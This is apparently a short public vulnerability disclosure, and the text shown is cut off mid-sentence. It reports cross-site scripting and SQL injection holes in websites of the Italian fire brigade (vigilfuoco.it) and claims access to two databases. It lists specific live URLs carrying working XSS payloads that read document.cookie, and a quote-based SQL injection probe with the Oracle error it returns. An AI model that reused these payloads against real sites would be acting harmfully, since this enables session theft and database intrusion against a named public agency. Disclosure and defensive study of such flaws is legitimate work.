Full of xss and sql injections. Access to 2 dbms. Possible system compromise. (main language asp) ----------------------------------------------OLD deadlinks/fixed ------------------------------- XSS http://www.vigilfuoco.it/emailCert/default.asp (form) "><script>alert(document.cookie);</script><" http://prevenzioneonline.vigilfuoco.it/VVF/HttpAdapter?CMD=loginDebole&forward=consultazioneMultiplaHandler&codFun=2&action_btn=loginInSessione&nomeServizio=Consultazione%3Cscript%3Ealert(document.cookie);%3C/script%3E SQL Injections The first with an oracle error http://www.vigilfuoco.it/informazioni/norme_attivita_istituzionali/indice_cronologico.asp?menu=52' ------------------------------------------------------- OraOLEDB error '80004005' ORA-01756: stringa tra virgolette terminata in modo irregolare /includes/menu.asp, line 44 -------------------------------------------------------- This one is related t...